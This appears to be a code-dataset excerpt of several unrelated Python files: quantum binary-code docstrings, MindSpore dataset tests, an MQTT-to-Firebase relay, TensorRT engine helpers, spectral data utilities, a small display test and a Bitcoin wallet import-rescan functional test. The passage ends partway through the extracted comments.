Concatenation: (e",d") = (e,d) * (e',d')
which means e": v" -> e'( e(v") ) and d": w" -> d( d'(w") )
where n" = n' and N" = N, with n = N' as necessary condition.
Appendage: (e",d") = (e,d) + (e',d')
which means e": (v + v') -> e(v) + e'(v') and d": (w + w') -> d(w) + d'(
w')
where the addition is to be understood as appending two vectors together,
so N" = N' + N and n" = n + n'.
Appending codes is particularly useful when considering segment codes or
segmented transforms.
A BinaryCode-instance is initialized by BinaryCode(A,d),
given the encoding (e) as n x N array or matrix-like nested lists A,
such that e(v) = (A v) mod 2. The decoding d is an array or a list
input of length N, which has entries either of type BinaryPolynomial, or of
valid type for an input of the BinaryPolynomial-constructor.
The signs + and \*, += and \*= are overloaded to implement concatenation
and appendage on BinaryCode-objects.
NOTE: multiplication of a BinaryCode with an integer yields a
multiple appending of the same code, the multiplication with another
BinaryCode their concatenation.
Attributes:
decoder (list): list of BinaryPolynomial: Outputs the decoding
functions as components.
encoder (scipy.sparse.csc_matrix): Outputs A, the linear matrix that
implements the encoding function.
n_modes (int): Outputs the number of modes.
n_qubits (int): Outputs the number of qubits.
Appends two binary codes via addition +.
Args:
appendix (BinaryCode): The code to append to the present one.
Returns (BinaryCode): global binary code
In-place appending a binary code with +=.
Args:
appendix (BinaryCode): The code to append to the present one.
Returns (BinaryCode): A global binary code with size
(n_modes1 + n_modes2), (n_qubits1,n_qubits2)
Raises:
TypeError: Appendix must be a BinaryCode.
In-place code concatenation or appendage via *= .
Multiplication with integer will yield appendage, otherwise
concatenation.
Args:
factor (int or BinaryCode): the BinaryCode to concatenate. In case
of int, it will append the code to itself factor times.
Returns (BinaryCode): segmented or concatenated code
Raises:
TypeError: factor must be an integer or a BinaryCode
BinaryCodeError: size mismatch between self and factor
ValueError: in case of an integer factor that is < 1
Initialization of a binary code.
Args:
encoding (np.ndarray or list): nested lists or binary 2D-array
decoding (array or list): list of BinaryPolynomial (list or str).
Raises:
TypeError: non-list, array like encoding or decoding, unsuitable
BinaryPolynomial generators,
BinaryCodeError: in case of decoder/encoder size mismatch or
decoder size, qubits indexed mismatch
Concatenation of two codes or appendage the same code factor times
in case of integer factor.
Args:
factor (int or BinaryCode): the BinaryCode to concatenate. In case
of int, it will append the code to itself factor times.
Returns (BinaryCode): segmented or concatenated code
Appending the same code factor times.
Args:
factor (int): integer defining number of appendages.
Returns (BinaryCode): Segmented code.
Raises:
TypeError: factor must be an integer
Return an easy-to-read string representation.
Concatenates two decodings
Args:
decoder_1 (iterable): list of BinaryPolynomial
decoding of the outer code layer
decoder_2 (iterable): list of BinaryPolynomial
decoding of the inner code layer
Returns (list): list of BinaryPolynomial the decoding defined by
w -> decoder_1( decoder_2(w) )
Shifts the indices of a decoder by a constant.
Args:
decoder (iterable): list of BinaryPolynomial; the decoder
shift_constant (int): the qubit index that corresponds to the offset.
Returns (list): list of BinaryPolynomial shifted decoder
Binary code class for Fermion-qubit mappings (arXiv:1712.07067)
Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. | 5,423 | en | 0.739648 |
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import sys
import pytest
import numpy as np
import pandas as pd
import mindspore.dataset as de
from mindspore import log as logger
import mindspore.dataset.transforms.vision.c_transforms as vision
def test_numpy_slices_list_1():
logger.info("Test Slicing a 1D list.")
np_data = [1, 2, 3]
ds = de.NumpySlicesDataset(np_data, shuffle=False)
for i, data in enumerate(ds):
assert data[0] == np_data[i]
def test_numpy_slices_list_2():
logger.info("Test Slicing a 2D list into 1D list.")
np_data = [[1, 2], [3, 4]]
ds = de.NumpySlicesDataset(np_data, column_names=["col1"], shuffle=False)
for i, data in enumerate(ds):
assert np.equal(data[0], np_data[i]).all()
def test_numpy_slices_list_3():
logger.info("Test Slicing list in the first dimension.")
np_data = [[[1, 2], [3, 4]], [[5, 6], [7, 8]]]
ds = de.NumpySlicesDataset(np_data, column_names=["col1"], shuffle=False)
for i, data in enumerate(ds):
assert np.equal(data[0], np_data[i]).all()
def test_numpy_slices_list_append():
logger.info("Test reading data of image list.")
DATA_DIR = ["../data/dataset/test_tf_file_3_images/train-0000-of-0001.data"]
resize_height, resize_width = 2, 2
data1 = de.TFRecordDataset(DATA_DIR)
resize_op = vision.Resize((resize_height, resize_width))
data1 = data1.map(input_columns=["image"], operations=[vision.Decode(True), resize_op])
res = []
for data in data1.create_dict_iterator():
res.append(data["image"])
ds = de.NumpySlicesDataset(res, column_names=["col1"], shuffle=False)
for i, data in enumerate(ds):
assert np.equal(data, res[i]).all()
def test_numpy_slices_dict_1():
logger.info("Test Dictionary structure data.")
np_data = {"a": [1, 2], "b": [3, 4]}
ds = de.NumpySlicesDataset(np_data, shuffle=False)
res = [[1, 3], [2, 4]]
for i, data in enumerate(ds):
assert data[0] == res[i][0]
assert data[1] == res[i][1]
def test_numpy_slices_tuple_1():
logger.info("Test slicing a list of tuple.")
np_data = [([1, 2], [3, 4]), ([11, 12], [13, 14]), ([21, 22], [23, 24])]
ds = de.NumpySlicesDataset(np_data, shuffle=False)
for i, data in enumerate(ds):
assert np.equal(data, np_data[i]).all()
assert sum([1 for _ in ds]) == 3
def test_numpy_slices_tuple_2():
logger.info("Test slicing a tuple of list.")
np_data = ([1, 2], [3, 4], [5, 6])
expected = [[1, 3, 5], [2, 4, 6]]
ds = de.NumpySlicesDataset(np_data, shuffle=False)
for i, data in enumerate(ds):
assert np.equal(data, expected[i]).all()
assert sum([1 for _ in ds]) == 2
def test_numpy_slices_tuple_3():
logger.info("Test reading different dimension of tuple data.")
features, labels = np.random.sample((5, 2)), np.random.sample((5, 1))
data = (features, labels)
ds = de.NumpySlicesDataset(data, column_names=["col1", "col2"], shuffle=False)
for i, data in enumerate(ds):
assert np.equal(data[0], features[i]).all()
assert data[1] == labels[i]
def test_numpy_slices_csv_value():
logger.info("Test loading value of csv file.")
csv_file = "../data/dataset/testNumpySlicesDataset/heart.csv"
df = pd.read_csv(csv_file)
target = df.pop("target")
df.pop("state")
np_data = (df.values, target.values)
ds = de.NumpySlicesDataset(np_data, column_names=["col1", "col2"], shuffle=False)
for i, data in enumerate(ds):
assert np.equal(np_data[0][i], data[0]).all()
assert np.equal(np_data[1][i], data[1]).all()
def test_numpy_slices_csv_dict():
logger.info("Test loading csv file as dict.")
csv_file = "../data/dataset/testNumpySlicesDataset/heart.csv"
df = pd.read_csv(csv_file)
df.pop("state")
res = df.values
ds = de.NumpySlicesDataset(dict(df), shuffle=False)
for i, data in enumerate(ds):
assert np.equal(data, res[i]).all()
def test_numpy_slices_num_samplers():
logger.info("Test num_samplers.")
np_data = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12], [13, 14], [15, 16]]
ds = de.NumpySlicesDataset(np_data, shuffle=False, num_samples=2)
for i, data in enumerate(ds):
assert np.equal(data[0], np_data[i]).all()
assert sum([1 for _ in ds]) == 2
def test_numpy_slices_distributed_sampler():
logger.info("Test distributed sampler.")
np_data = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12], [13, 14], [15, 16]]
ds = de.NumpySlicesDataset(np_data, shuffle=False, shard_id=0, num_shards=4)
for i, data in enumerate(ds):
assert np.equal(data[0], np_data[i * 4]).all()
assert sum([1 for _ in ds]) == 2
def test_numpy_slices_distributed_shard_limit():
logger.info("Test Slicing a 1D list.")
np_data = [1, 2, 3]
num = sys.maxsize
with pytest.raises(ValueError) as err:
de.NumpySlicesDataset(np_data, num_shards=num, shard_id=0, shuffle=False)
assert "Input num_shards is not within the required interval of (1 to 2147483647)." in str(err.value)
def test_numpy_slices_distributed_zero_shard():
logger.info("Test Slicing a 1D list.")
np_data = [1, 2, 3]
with pytest.raises(ValueError) as err:
de.NumpySlicesDataset(np_data, num_shards=0, shard_id=0, shuffle=False)
assert "Input num_shards is not within the required interval of (1 to 2147483647)." in str(err.value)
def test_numpy_slices_sequential_sampler():
logger.info("Test numpy_slices_dataset with SequentialSampler and repeat.")
np_data = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12], [13, 14], [15, 16]]
ds = de.NumpySlicesDataset(np_data, sampler=de.SequentialSampler()).repeat(2)
for i, data in enumerate(ds):
assert np.equal(data[0], np_data[i % 8]).all()
def test_numpy_slices_invalid_column_names_type():
logger.info("Test incorrect column_names input")
np_data = [1, 2, 3]
with pytest.raises(TypeError) as err:
de.NumpySlicesDataset(np_data, column_names=[1], shuffle=False)
assert "Argument column_names[0] with value 1 is not of type (<class 'str'>,)." in str(err.value)
def test_numpy_slices_invalid_column_names_string():
logger.info("Test incorrect column_names input")
np_data = [1, 2, 3]
with pytest.raises(ValueError) as err:
de.NumpySlicesDataset(np_data, column_names=[""], shuffle=False)
assert "column_names[0] should not be empty" in str(err.value)
def test_numpy_slices_invalid_empty_column_names():
logger.info("Test incorrect column_names input")
np_data = [1, 2, 3]
with pytest.raises(ValueError) as err:
de.NumpySlicesDataset(np_data, column_names=[], shuffle=False)
assert "column_names should not be empty" in str(err.value)
def test_numpy_slices_invalid_empty_data_column():
logger.info("Test incorrect column_names input")
np_data = []
with pytest.raises(ValueError) as err:
de.NumpySlicesDataset(np_data, shuffle=False)
assert "Argument data cannot be empty" in str(err.value)
if __name__ == "__main__":
test_numpy_slices_list_1()
test_numpy_slices_list_2()
test_numpy_slices_list_3()
test_numpy_slices_list_append()
test_numpy_slices_dict_1()
test_numpy_slices_tuple_1()
test_numpy_slices_tuple_2()
test_numpy_slices_tuple_3()
test_numpy_slices_csv_value()
test_numpy_slices_csv_dict()
test_numpy_slices_num_samplers()
test_numpy_slices_distributed_sampler()
test_numpy_slices_distributed_shard_limit()
test_numpy_slices_distributed_zero_shard()
test_numpy_slices_sequential_sampler()
test_numpy_slices_invalid_column_names_type()
test_numpy_slices_invalid_column_names_string()
test_numpy_slices_invalid_empty_column_names()
test_numpy_slices_invalid_empty_data_column()
| tests/ut/python/dataset/test_dataset_numpy_slices.py | 8,500 | Copyright 2020 Huawei Technologies Co., Ltd Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ============================================================================== | 640 | en | 0.808401 |
""" Bu kod MQTT den alir FireBase e atar """
import firebase_admin
from firebase_admin import credentials
from firebase_admin import firestore
import paho.mqtt.client as mqtt
from time import sleep
import json
import sys
Fb_Coll = "color"
def main():
x = open("../ip.json")
data_ = json.load(x)
ip = data_["ip"]
x.close()
cred = credentials.Certificate("../Login.json")
firebase_admin.initialize_app(cred)
Server = ip
db = firestore.client()
def on_connect(client, userdata, flags, rc):
print("Connected with result code "+str(rc))
client.subscribe("/blue")
print("Topics Subscribed Successfully")
def on_message(client, userdata, msg):
topic = msg.topic
data = msg.payload.decode('UTF-8')
print("Mqtt'den: Topic: {}, Message: {}".format(topic,data))
if topic =="/blue":
db.collection(Fb_Coll).document("color").update({ topic: data })
print("SEND")
sleep(1)
client = mqtt.Client()
client.connect(Server, 1883, 60)
client.on_connect = on_connect
client.on_message = on_message
client.loop_forever()
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
print("\nPrograms was stopped")
sys.exit()
| MyAwsomeMainCode/send_.py | 1,412 | Bu kod MQTT den alir FireBase e atar | 36 | tr | 0.368284 |
#
# SPDX-FileCopyrightText: Copyright (c) 1993-2022 NVIDIA CORPORATION & AFFILIATES. All rights reserved.
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Utility functions for building/saving/loading TensorRT Engine
import sys
import os
import tensorrt as trt
import pycuda.driver as cuda
import numpy as np
from utils.modeldata import ModelData
# ../../common.py
sys.path.insert(1,
os.path.join(
os.path.dirname(os.path.realpath(__file__)),
os.pardir,
os.pardir
)
)
from common import HostDeviceMem
def allocate_buffers(engine):
"""Allocates host and device buffer for TRT engine inference.
This function is similair to the one in ../../common.py, but
converts network outputs (which are np.float32) appropriately
before writing them to Python buffer. This is needed, since
TensorRT plugins doesn't support output type description, and
in our particular case, we use NMS plugin as network output.
Args:
engine (trt.ICudaEngine): TensorRT engine
Returns:
inputs [HostDeviceMem]: engine input memory
outputs [HostDeviceMem]: engine output memory
bindings [int]: buffer to device bindings
stream (cuda.Stream): cuda stream for engine inference synchronization
"""
inputs = []
outputs = []
bindings = []
stream = cuda.Stream()
# Current NMS implementation in TRT only supports DataType.FLOAT but
# it may change in the future, which could brake this sample here
# when using lower precision [e.g. NMS output would not be np.float32
# anymore, even though this is assumed in binding_to_type]
binding_to_type = {"Input": np.float32, "NMS": np.float32, "NMS_1": np.int32}
for binding in engine:
size = trt.volume(engine.get_binding_shape(binding)) * engine.max_batch_size
dtype = binding_to_type[str(binding)]
# Allocate host and device buffers
host_mem = cuda.pagelocked_empty(size, dtype)
device_mem = cuda.mem_alloc(host_mem.nbytes)
# Append the device buffer to device bindings.
bindings.append(int(device_mem))
# Append to the appropriate list.
if engine.binding_is_input(binding):
inputs.append(HostDeviceMem(host_mem, device_mem))
else:
outputs.append(HostDeviceMem(host_mem, device_mem))
return inputs, outputs, bindings, stream
def build_engine(uff_model_path, trt_logger, trt_engine_datatype=trt.DataType.FLOAT, batch_size=1, silent=False):
with trt.Builder(trt_logger) as builder, builder.create_network() as network, builder.create_builder_config() as config, trt.UffParser() as parser, trt.Runtime(trt_logger) as runtime:
config.max_workspace_size = 1 << 30
if trt_engine_datatype == trt.DataType.HALF:
config.set_flag(trt.BuilderFlag.FP16)
builder.max_batch_size = batch_size
parser.register_input(ModelData.INPUT_NAME, ModelData.INPUT_SHAPE)
parser.register_output("MarkOutput_0")
parser.parse(uff_model_path, network)
if not silent:
print("Building TensorRT engine. This may take few minutes.")
plan = builder.build_serialized_network(network, config)
return runtime.deserialize_cuda_engine(plan)
def save_engine(engine, engine_dest_path):
buf = engine.serialize()
with open(engine_dest_path, 'wb') as f:
f.write(buf)
def load_engine(trt_runtime, engine_path):
with open(engine_path, 'rb') as f:
engine_data = f.read()
engine = trt_runtime.deserialize_cuda_engine(engine_data)
return engine
| samples/python/uff_ssd/utils/engine.py | 4,146 | Allocates host and device buffer for TRT engine inference.
This function is similair to the one in ../../common.py, but
converts network outputs (which are np.float32) appropriately
before writing them to Python buffer. This is needed, since
TensorRT plugins doesn't support output type description, and
in our particular case, we use NMS plugin as network output.
Args:
engine (trt.ICudaEngine): TensorRT engine
Returns:
inputs [HostDeviceMem]: engine input memory
outputs [HostDeviceMem]: engine output memory
bindings [int]: buffer to device bindings
stream (cuda.Stream): cuda stream for engine inference synchronization
SPDX-FileCopyrightText: Copyright (c) 1993-2022 NVIDIA CORPORATION & AFFILIATES. All rights reserved. SPDX-License-Identifier: Apache-2.0 Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. Utility functions for building/saving/loading TensorRT Engine ../../common.py Current NMS implementation in TRT only supports DataType.FLOAT but it may change in the future, which could brake this sample here when using lower precision [e.g. NMS output would not be np.float32 anymore, even though this is assumed in binding_to_type] Allocate host and device buffers Append the device buffer to device bindings. Append to the appropriate list. | 1,749 | en | 0.85045 |
from .imports import *
def rainbow_to_vector(r, timeformat='h'):
""" Convert Rainbow object to np.arrays
Parameters
----------
r : Rainbow object
chromatic Rainbow object to convert into array format
timeformat : str
(optional, default='hours')
The time format to use (seconds, minutes, hours, days etc.)
Returns
----------
rflux : np.array
flux (MJy/sr) [n_wavelengths x n_integrations]
rfluxe : np.array
flux error (MJy/sr) [n_wavelengths x n_integrations]
rtime : np.array
time (BJD_TDB, houra) [n_integrations]
rwavel : np.array
wavelength (microns) [n_wavelengths]
"""
secondformat = ['second', 'seconds', 'sec', 's']
minuteformat = ['minute', 'minutes', 'min', 'm']
hourformat = ['hour', 'hours', 'h']
dayformat = ['day', 'days', 'd']
yearformat = ['year', 'years', 'y']
rflux = r.fluxlike['flux'] # flux (MJy/sr) : [n_wavelengths x n_integrations]
rfluxe = r.fluxlike['uncertainty'] # flux error (MJy/sr) : [n_wavelengths x n_integrations]
rtime = r.timelike['time'] # time (BJD_TDB, hours) : [n_integrations]
rwavel = r.wavelike['wavelength'] # wavelength (microns) : [n_wavelengths]
# change the time array into the requested format (e.g. seconds, minutes, days etc.)
if timeformat in secondformat:
rtime = rtime * 3600
elif timeformat in minuteformat:
rtime = rtime * 60
elif timeformat in hourformat:
# hours is the default time setting
pass
elif timeformat in dayformat:
rtime = rtime / 24.
elif timeformat in yearformat:
rtime = rtime / (24 * 365.)
else:
warnings.warn("Unrecognised Time Format!")
return
return rflux, rfluxe, rtime, rwavel
def rainbow_to_df(r, timeformat='h'):
""" Convert Rainbow object to pandas dataframe
Parameters
----------
r : Rainbow object
chromatic Rainbow object to convert into pandas df format
timeformat : str
(optional, default='hours')
The time format to use (seconds, minutes, hours, days etc.)
Returns
----------
pd.DataFrame
"""
rflux, rfluxe, rtime, rwavel = rainbow_to_vector(r, timeformat)
x, y = np.meshgrid(rtime.to_value(), rwavel.to_value())
rainbow_dict = {f"Time ({timeformat})": x.ravel(), "Wavelength (microns)": y.ravel(), "Flux": rflux.ravel(),
"Flux Error": rfluxe.ravel()}
df = pd.DataFrame(rainbow_dict)
return df
def bin_data(jd, y, mins_jd):
t = np.array(jd)
split = []
sorted_t = t
sorted_y = y
start = sorted_t[0]
nextbin = sorted_t[np.absolute(sorted_t - start) > mins_jd]
while nextbin != []:
start = start + mins_jd
ind_st = np.argmax(sorted_t > start)
if len(split) > 0:
if ind_st != split[-1]:
split.append(ind_st)
time = sorted_t[ind_st:]
# need to add defn for time here?
else:
split.append(ind_st)
time = sorted_t[ind_st:]
nextbin = time[np.absolute(time - start) > mins_jd]
times = np.split(sorted_t, split)
ys = np.split(sorted_y, split)
bins = np.zeros(len(times))
binned_y = np.zeros(len(times))
binned_err = np.zeros(len(times))
for i in range(len(times)):
if len(ys[i]) > 0:
try:
bins[i] = np.nanmean(times[i])
binned_y[i] = np.nanmean(ys[i])
n = len(times[i])
# standard error in the median:
# binned_err[i] = 1.253 * np.nanstd(ys[i]) / np.sqrt(n)
binned_err[i] = np.nanstd(ys[i]) / np.sqrt(n)
except Exception as e:
print(e)
pass
bin_t = bins[binned_y != 0]
bin_e = binned_err[binned_y != 0]
bin_y = binned_y[binned_y != 0]
return bin_t, bin_y, bin_e
def find_nearest(array, value):
# array = np.asarray(array)
idx = (np.abs(array - value)).argmin()
return idx
def remove_nans(arr_with_nans,*otherarrs):
nanfree_arrs = []
for arr in otherarrs:
nanfree_arrs.append(arr[~np.isnan(arr_with_nans)])
arr_without_nans = arr_with_nans[~np.isnan(arr_with_nans)]
return arr_without_nans, nanfree_arrs | src/utils.py | 4,410 | Convert Rainbow object to pandas dataframe
Parameters
----------
r : Rainbow object
chromatic Rainbow object to convert into pandas df format
timeformat : str
(optional, default='hours')
The time format to use (seconds, minutes, hours, days etc.)
Returns
----------
pd.DataFrame
Convert Rainbow object to np.arrays
Parameters
----------
r : Rainbow object
chromatic Rainbow object to convert into array format
timeformat : str
(optional, default='hours')
The time format to use (seconds, minutes, hours, days etc.)
Returns
----------
rflux : np.array
flux (MJy/sr) [n_wavelengths x n_integrations]
rfluxe : np.array
flux error (MJy/sr) [n_wavelengths x n_integrations]
rtime : np.array
time (BJD_TDB, houra) [n_integrations]
rwavel : np.array
wavelength (microns) [n_wavelengths]
flux (MJy/sr) : [n_wavelengths x n_integrations] flux error (MJy/sr) : [n_wavelengths x n_integrations] time (BJD_TDB, hours) : [n_integrations] wavelength (microns) : [n_wavelengths] change the time array into the requested format (e.g. seconds, minutes, days etc.) hours is the default time setting need to add defn for time here? standard error in the median: binned_err[i] = 1.253 * np.nanstd(ys[i]) / np.sqrt(n) array = np.asarray(array) | 1,358 | en | 0.374662 |
"""
This test will initialize the display using displayio
and draw a solid red background
"""
import board
import displayio
from adafruit_st7735r import ST7735R
spi = board.SPI()
tft_cs = board.D5
tft_dc = board.D6
displayio.release_displays()
display_bus = displayio.FourWire(spi, command=tft_dc, chip_select=tft_cs, reset=board.D9)
display = ST7735R(display_bus, width=128, height=160, bgr=True)
# Make the display context
splash = displayio.Group(max_size=10)
display.show(splash)
color_bitmap = displayio.Bitmap(128, 160, 1)
color_palette = displayio.Palette(1)
color_palette[0] = 0xFF0000
bg_sprite = displayio.TileGrid(color_bitmap,
pixel_shader=color_palette,
x=0, y=0)
splash.append(bg_sprite)
while True:
pass
| infra/libs-400rc2-20190512/examples/st7735r_128x160_simpletest.py | 826 | This test will initialize the display using displayio
and draw a solid red background
Make the display context | 112 | en | 0.412232 |
#!/usr/bin/env python3
# Copyright (c) 2014-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test wallet import RPCs.
Test rescan behavior of importaddress, importpubkey, importprivkey, and
importmulti RPCs with different types of keys and rescan options.
In the first part of the test, node 0 creates an address for each type of
import RPC call and sends BTC to it. Then other nodes import the addresses,
and the test makes listtransactions and getbalance calls to confirm that the
importing node either did or did not execute rescans picking up the send
transactions.
In the second part of the test, node 0 sends more BTC to each address, and the
test makes more listtransactions and getbalance calls to confirm that the
importing nodes pick up the new transactions regardless of whether rescans
happened previously.
"""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import (assert_raises_rpc_error, connect_nodes, sync_blocks, assert_equal, set_node_times)
import collections
import enum
import itertools
import sys
Call = enum.Enum("Call", "single multi")
Data = enum.Enum("Data", "address pub priv")
Rescan = enum.Enum("Rescan", "no yes late_timestamp")
class Variant(collections.namedtuple("Variant", "call data rescan prune")):
"""Helper for importing one key and verifying scanned transactions."""
def try_rpc(self, func, *args, **kwargs):
if self.expect_disabled:
assert_raises_rpc_error(-4, "Rescan is disabled in pruned mode", func, *args, **kwargs)
else:
return func(*args, **kwargs)
def do_import(self, timestamp):
"""Call one key import RPC."""
if self.call == Call.single:
if self.data == Data.address:
response = self.try_rpc(self.node.importaddress, self.address["address"], self.label,
self.rescan == Rescan.yes)
elif self.data == Data.pub:
response = self.try_rpc(self.node.importpubkey, self.address["pubkey"], self.label,
self.rescan == Rescan.yes)
elif self.data == Data.priv:
response = self.try_rpc(self.node.importprivkey, self.key, self.label, self.rescan == Rescan.yes)
assert_equal(response, None)
elif self.call == Call.multi:
response = self.node.importmulti([{
"scriptPubKey": {
"address": self.address["address"]
},
"timestamp": timestamp + TIMESTAMP_WINDOW + (1 if self.rescan == Rescan.late_timestamp else 0),
"pubkeys": [self.address["pubkey"]] if self.data == Data.pub else [],
"keys": [self.key] if self.data == Data.priv else [],
"label": self.label,
"watchonly": self.data != Data.priv
}], {"rescan": self.rescan in (Rescan.yes, Rescan.late_timestamp)})
assert_equal(response, [{"success": True}])
def check(self, txid=None, amount=None, confirmations=None):
"""Verify that getbalance/listtransactions return expected values."""
balance = self.node.getbalance(self.label, 0, False, True)
assert_equal(balance, self.expected_balance)
txs = self.node.listtransactions(self.label, 10000, 0, True)
assert_equal(len(txs), self.expected_txs)
if txid is not None:
tx, = [tx for tx in txs if tx["txid"] == txid]
assert_equal(tx["account"], self.label)
assert_equal(tx["address"], self.address["address"])
assert_equal(tx["amount"], amount)
assert_equal(tx["category"], "receive")
assert_equal(tx["label"], self.label)
assert_equal(tx["txid"], txid)
assert_equal(tx["confirmations"], confirmations)
assert_equal("trusted" not in tx, True)
# Verify the transaction is correctly marked watchonly depending on
# whether the transaction pays to an imported public key or
# imported private key. The test setup ensures that transaction
# inputs will not be from watchonly keys (important because
# involvesWatchonly will be true if either the transaction output
# or inputs are watchonly).
if self.data != Data.priv:
assert_equal(tx["involvesWatchonly"], True)
else:
assert_equal("involvesWatchonly" not in tx, True)
# List of Variants for each way a key or address could be imported.
IMPORT_VARIANTS = [Variant(*variants) for variants in itertools.product(Call, Data, Rescan, (False, True))]
# List of nodes to import keys to. Half the nodes will have pruning disabled,
# half will have it enabled. Different nodes will be used for imports that are
# expected to cause rescans, and imports that are not expected to cause
# rescans, in order to prevent rescans during later imports picking up
# transactions associated with earlier imports. This makes it easier to keep
# track of expected balances and transactions.
ImportNode = collections.namedtuple("ImportNode", "prune rescan")
IMPORT_NODES = [ImportNode(*fields) for fields in itertools.product((False, True), repeat=2)]
# Rescans start at the earliest block up to 2 hours before the key timestamp.
TIMESTAMP_WINDOW = 2 * 60 * 60
class ImportRescanTest(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 2 + len(IMPORT_NODES)
def setup_network(self):
extra_args = [[] for _ in range(self.num_nodes)]
for i, import_node in enumerate(IMPORT_NODES, 2):
if import_node.prune:
# txindex is enabled by default in Dash and needs to be disabled for import-rescan.py
extra_args[i] += ["-prune=1", "-txindex=0", "-reindex"]
self.add_nodes(self.num_nodes, extra_args, stderr=sys.stdout)
self.start_nodes()
for i in range(1, self.num_nodes):
connect_nodes(self.nodes[i], 0)
def run_test(self):
# Create one transaction on node 0 with a unique amount and label for
# each possible type of wallet import RPC.
for i, variant in enumerate(IMPORT_VARIANTS):
variant.label = "label {} {}".format(i, variant)
variant.address = self.nodes[1].validateaddress(self.nodes[1].getnewaddress(variant.label))
variant.key = self.nodes[1].dumpprivkey(variant.address["address"])
variant.initial_amount = 10 - (i + 1) / 4.0
variant.initial_txid = self.nodes[0].sendtoaddress(variant.address["address"], variant.initial_amount)
# Generate a block containing the initial transactions, then another
# block further in the future (past the rescan window).
self.nodes[0].generate(1)
assert_equal(self.nodes[0].getrawmempool(), [])
timestamp = self.nodes[0].getblockheader(self.nodes[0].getbestblockhash())["time"]
set_node_times(self.nodes, timestamp + TIMESTAMP_WINDOW + 1)
self.nodes[0].generate(1)
self.sync_blocks()
# For each variation of wallet key import, invoke the import RPC and
# check the results from getbalance and listtransactions.
for variant in IMPORT_VARIANTS:
variant.expect_disabled = variant.rescan == Rescan.yes and variant.prune and variant.call == Call.single
expect_rescan = variant.rescan == Rescan.yes and not variant.expect_disabled
variant.node = self.nodes[2 + IMPORT_NODES.index(ImportNode(variant.prune, expect_rescan))]
variant.do_import(timestamp)
if expect_rescan:
variant.expected_balance = variant.initial_amount
variant.expected_txs = 1
variant.check(variant.initial_txid, variant.initial_amount, 2)
else:
variant.expected_balance = 0
variant.expected_txs = 0
variant.check()
# Create new transactions sending to each address.
for i, variant in enumerate(IMPORT_VARIANTS):
variant.sent_amount = 10 - (2 * i + 1) / 8.0
variant.sent_txid = self.nodes[0].sendtoaddress(variant.address["address"], variant.sent_amount)
# Generate a block containing the new transactions.
self.nodes[0].generate(1)
assert_equal(self.nodes[0].getrawmempool(), [])
self.sync_blocks()
# Check the latest results from getbalance and listtransactions.
for variant in IMPORT_VARIANTS:
if not variant.expect_disabled:
variant.expected_balance += variant.sent_amount
variant.expected_txs += 1
variant.check(variant.sent_txid, variant.sent_amount, 1)
else:
variant.check()
if __name__ == "__main__":
ImportRescanTest().main()
| test/functional/import-rescan.py | 9,050 | Helper for importing one key and verifying scanned transactions.
Verify that getbalance/listtransactions return expected values.
Call one key import RPC.
Test wallet import RPCs.
Test rescan behavior of importaddress, importpubkey, importprivkey, and
importmulti RPCs with different types of keys and rescan options.
In the first part of the test, node 0 creates an address for each type of
import RPC call and sends BTC to it. Then other nodes import the addresses,
and the test makes listtransactions and getbalance calls to confirm that the
importing node either did or did not execute rescans picking up the send
transactions.
In the second part of the test, node 0 sends more BTC to each address, and the
test makes more listtransactions and getbalance calls to confirm that the
importing nodes pick up the new transactions regardless of whether rescans
happened previously.
!/usr/bin/env python3 Copyright (c) 2014-2016 The Bitcoin Core developers Distributed under the MIT software license, see the accompanying file COPYING or http://www.opensource.org/licenses/mit-license.php. Verify the transaction is correctly marked watchonly depending on whether the transaction pays to an imported public key or imported private key. The test setup ensures that transaction inputs will not be from watchonly keys (important because involvesWatchonly will be true if either the transaction output or inputs are watchonly). List of Variants for each way a key or address could be imported. List of nodes to import keys to. Half the nodes will have pruning disabled, half will have it enabled. Different nodes will be used for imports that are expected to cause rescans, and imports that are not expected to cause rescans, in order to prevent rescans during later imports picking up transactions associated with earlier imports. This makes it easier to keep track of expected balances and transactions. Rescans start at the earliest block up to 2 hours before the key timestamp. txindex is enabled by default in Dash and needs to be disabled for import-rescan.py Create one transaction on node 0 with a unique amount and label for each possible type of wallet import RPC. Generate a block containing the initial transactions, then another block further in the future (past the rescan window). For each variation of wallet key import, invoke the import RPC and check 